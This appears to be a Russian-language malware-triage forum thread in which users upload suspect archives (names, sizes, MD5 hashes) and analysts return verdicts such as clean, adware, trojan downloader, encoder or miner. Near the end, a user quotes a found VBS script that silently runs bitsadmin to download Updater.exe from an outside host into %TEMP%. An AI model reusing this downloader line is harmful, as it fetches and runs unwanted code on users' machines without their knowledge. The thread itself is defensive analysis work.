Файл сохранён как 141219_205648_eblodra1nka_549458d028b84.zip
Размер файла 2970866
MD5 cfdd5e9b497ecb90d43dbcd1e8a06514802607
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
проверьте, прошу!
Printable View
Файл сохранён как 141219_205648_eblodra1nka_549458d028b84.zip
Размер файла 2970866
MD5 cfdd5e9b497ecb90d43dbcd1e8a06514802607
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
проверьте, прошу!
Файл сохранён как 150103_221202_virus_54a830f2ae667.zip
Размер файла 1391163
MD5 93b6a552670bdec1a2704b62ad2690f7
[b]rustorkan[/b], чистый.
Доброго времени суток! Подозрение на встроенный майнер.
Файл сохранён как 150108_210346_virus_54aeb8725038e.zip
Размер файла 6670052
MD5 7cc39d76b5225fc700280dd6a2bbe28a
[quote="Adanedhel;1209467"]Подозрение на встроенный майнер.[/quote]
всего лишь adware
Файл сохранён как 150203_175517_договор_54d0d34592818.zip
Размер файла 181687
MD5 e196c45d10f61ae0cafda2f7b285182c
[QUOTE=Дмитрий Смышляев;1224132]Файл сохранён как 150203_175517_договор_54d0d34592818.zip
Размер файла 181687
MD5 e196c45d10f61ae0cafda2f7b285182c[/QUOTE]
Trojan.Encoder.398
Файл сохранён как 150213_164802_virus_54ddf2829af72.zip
Размер файла 22391933
MD5 48eb8430d481c44a78f60c0657a4e54f
Файл сохранён как 150225_200447_virus_54edf29fe7cf9.zip
Размер файла 4547491
MD5 49156cc04d0da84a2443da215cb15a21
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
Файл сохранён как 150225_204822_virus_54edfcd697eaa.zip
Размер файла 3583411
MD5 fd59c503e22f914942334e1da73c0ac6
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
Файл сохранён как 150225_204840_virus2_54edfce89a695.zip
Размер файла 84424
MD5 36eae8e8fc5c0d3a160817d85c338346
[QUOTE]Файл сохранён как 150225_200447_virus_54edf29fe7cf9.zip
Размер файла 4547491
MD5 49156cc04d0da84a2443da215cb15a21[/QUOTE]
1EEA.tmp, 8303.tmp, cheatengine64.exe - Trojan.DownLoader12.19543
[QUOTE]Файл сохранён как 150225_204822_virus_54edfcd697eaa.zip
Размер файла 3583411
MD5 fd59c503e22f914942334e1da73c0ac6[/QUOTE]
Чистые файлы.
[QUOTE]Файл сохранён как 150225_204840_virus2_54edfce89a695.zip
Размер файла 84424
MD5 36eae8e8fc5c0d3a160817d85c338346[/QUOTE]
Secret.exe - Trojan-Downloader.Win32.Agent.btlp
Здрасьте.
Файл сохранён как 150306_222010_virus_54f9efda1b1d4.zip
Размер файла 1530851
MD5 f9b6f535c92c7923271193169c1a7d07
Спасибо.
[b]Vintorez174[/b], BitCoinMiner это.
Добрый день
Файл сохранён как 150326_174919_Virus_55140e5f7164f.zip
Размер файла 1507539
MD5 5ee3746c3d3cdc6b3c5f5d198c204832
Прошу проверить.
Пользователи после распаковки данного файла обнаруживают у себя такие программы как CinemaP-1.9V16.03, Ge-Force, iWebar, MyBestOffersToday 033.90, MyStartSearch, Omniboxes, SavePass 1.1, Sense, Shopper-Pro и YTDownloader
[QUOTE=AntonNosov;1251847]Добрый день
Файл сохранён как 150326_174919_Virus_55140e5f7164f.zip
Размер файла 1507539
MD5 5ee3746c3d3cdc6b3c5f5d198c204832
Прошу проверить.
Пользователи после распаковки данного файла обнаруживают у себя такие программы как CinemaP-1.9V16.03, Ge-Force, iWebar, MyBestOffersToday 033.90, MyStartSearch, Omniboxes, SavePass 1.1, Sense, Shopper-Pro и YTDownloader[/QUOTE]
virus.exe - not-a-virus Downloader.Win32.Agent.dcsa
Adware (Рекламное ПО).
Добрый день!
Файл сохранён как 150413_065920_virus_552b310821521.zip
Размер файла 10077
MD5 427f116856038d0e22f7096140144021
Подозрение на наличие эксплойта.
Тема с пояснениями создана по следующей ссылке [url]http://virusinfo.info/showthread.php?t=181696[/url]
[QUOTE=Temar;1259442]Добрый день!
Файл сохранён как 150413_065920_virus_552b310821521.zip
Размер файла 10077
MD5 427f116856038d0e22f7096140144021
Подозрение на наличие эксплойта.
Тема с пояснениями создана по следующей ссылке [url]http://virusinfo.info/showthread.php?t=181696[/url][/QUOTE]
Что-то я не вижу этого карантина.
[QUOTE=mike 1;1260029]Что-то я не вижу этого карантина.[/QUOTE]
Странно.
Еще раз закачал.
Файл сохранён как 150415_054216_virus_552dc1f8516b4.zip
Размер файла 10071
MD5 40ca0eead4152a5970079223ff3d7877
Файл сохранён как 150424_201947_virus_553a6d23bbdc5.zip
Размер файла 4169465
MD5 bdaeecc741ab4c9561b687c6b02eec6d
файлы закачаны...
[b]crul[/b], батники это вирусные. firеfох.bаt.exe - копия легального файла скопированная тем же вирусом, которые создал эти батники.
vcr446.exe - адварь.
Файл сохранён как 150428_225502_quarantine_553fd7864d752.zip
Размер файла 12359993
MD5 85c20b62f70b0a9ffa351581bf172941
[QUOTE]C:\Program Files (x86)\Opera\launcher.exe - чистый.
C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe - чистый
C:\Program Files\WindowsApps\Microsoft.SkypeApp_3.1.0.1007_x86__kzf8qxf38zg5c\LibWrap.dll - чистый
C:\windows\SYSTEM32\sysfiles\msimg32.dll - чистый
C:\windows\SYSTEM32\sysfiles\oledlg.dll - чистый
C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe - not-a-virus:RemoteAdmin.Win32.Agent.lq (от программы удаленного доступа Radmin)[/QUOTE]
[COLOR="#FFFFFF"]...[/COLOR]
[QUOTE=mike 1;1266333][COLOR="#FFFFFF"]...[/COLOR][/QUOTE]
Вот эти файлы C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe появились после установки "активатора офиса"
Просто удалить наверное мало?
[quote="Userik;1266334"]Вот эти файлы C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe появились после установки "активатора офиса"[/quote]
значит, кто-то теперь имеет удалённый доступ к вашей системе.
[quote="Userik;1266334"]Просто удалить наверное мало?[/quote][url]http://virusinfo.info/showthread.php?t=1235[/url]
Файл сохранён как 150515_211536_virus_555629b8178d2.zip
Размер файла 4537931
MD5 f7b9ebb092e4d1ed46a31530a955f434
Файл сохранён как 150519_064934_virusinfo_auto_MIR_555aa4beaec7d.zip
Размер файла 60675520
MD5 b01ce9069272ae9d1809775af4f36760
[b]Userik[/b], для файлов типа
[quote="Userik;1273701"]150519_064934_virusinfo_auto_MIR_555aa4beaec7d.zip[/quote]
вот эта процедура [url]http://virusinfo.info/content.php?r=290-virus-detector[/url]
там же вы сами можете увидеть отчёт по файлам. Файлы в архиве чистые.
Здравствуйте!
Полезная прожка 10-Strike Connection Monitor Pro, но:
[ATTACH=CONFIG]567250[/ATTACH]
Ваш вердикт и советы, пожалуйста?
P.S. Да, да, крякнутая...
P.P.S. Ложное срабатывание ввиду особенностей работы этой программы?
Файл сохранён как 150809_224109_run_55c79ec58c0c5.zip
Размер файла 48498
MD5 550e5a49a13a21141443bcb6e05d9bfe
скажите пожалуйста, какой вред может нанести этот файл, и как этого избежать можно, при этом не удаляя сам файл? без него нельзя игру запустить:(
[QUOTE]Ваш вердикт и советы, пожалуйста?[/QUOTE]
А вы файл загружали?
[QUOTE]скажите пожалуйста, какой вред может нанести этот файл, и как этого избежать можно, при этом не удаляя сам файл? без него нельзя игру запустить[/QUOTE]
Это не вирус, но эта программа может выполнять скрытно другие файлы, например какой-нибудь батник.
[QUOTE=mike 1;1302993]А вы файл загружали?
Это не вирус, но эта программа может выполнять скрытно другие файлы, например какой-нибудь батник.[/QUOTE]
а как узнать о том, действует ли она скрытно или нет?
[QUOTE=cvsdfvgsd;1302998]а как узнать о том, действует ли она скрытно или нет?[/QUOTE]
Создайте свою тему с логами в разделе Помогите.
по идее, апдейтер для игры. скажите пожалуйста, есть ли там вирусы?
Файл сохранён как 150813_100928_virus_55cc349895dd9.zip
Размер файла 934131
MD5 a5ef5cfb560fe1a6ec14d4665a10d62a
Drweb нашёл файл C:/task.vbs
содержимое файла:
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high %TEMP%/Updater.exe",0, True)
Set WshShell = Nothing
Результаты проверки: [url]https://www.virustotal.com/ru/file/d49b462f9d405d5d0cd43fd45606a70a8dfc9d191e81b49798c4e83e1768cd5c/analysis/1440875485/[/url]
Это вирус?
[quote="MihailKrasnodar;1309178"]Drweb нашёл файл C:/task.vbs
содержимое файла:
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high //cds.d5v5w7m8.hwcdn.net/run/Updater.exe %TEMP%/Updater.exe",0, True)
Set WshShell = Nothing
Результаты проверки: [URL]https://www.virustotal.com/ru/file/d...is/1440875485/[/URL]
Это вирус?[/quote]
Не, не вирус... Сей скрипт всего лишь загружает ту фигню, что в Вашем посте зовется апдейтер.экзе.
А вот уже сам апдейтер - это вот что: [URL="https://www.virustotal.com/ru/file/34b14c6772794d78010a14110e614a678e4f5f517fd9702d44c0adc13db6c34b/analysis/1440906409/"]тык[/URL] - потенциально нежелательная программа, предназначенная для показа рекламы в браузерах, отображения модифицированных страниц, открытия доп. вкладок и т.п.
Поищите в папках для временных файлов этот апдейтер. Может уже загрузился...
P.S. Будьте добры, потрите ссылку на updater в тексте. Вдруг кто тыкнет случайно :)
Файл сохранён как 151009_183645_JLRPatch_EN_5617d0fdd6bbc.zip
Размер файла 2770339
MD5 ea281b8b6495fcfc666465ba1f241cd2
Что с темой?
[quote="Adanedhel;1321070"]Файл сохранён как 151009_183645_JLRPatch_EN_5617d0fdd6bbc.zip
Размер файла 2770339
MD5 ea281b8b6495fcfc666465ba1f241cd2[/quote]
Зловред.
Файл сохранён как 151016_175501_virus_562101b56a283.zip
Размер файла 820669
MD5 06f1015d556beea817dce0fb636f9e7c
[QUOTE=xuim;1322987]Файл сохранён как 151016_175501_virus_562101b56a283.zip
Размер файла 820669
MD5 06f1015d556beea817dce0fb636f9e7c[/QUOTE]
Заражен. Рекламное ПО.
Файл сохранён как 151024_225557_virus_562bd43db5a7a.zip
Размер файла 731023
MD5 3faf4b6da9ab726661654266b09620f2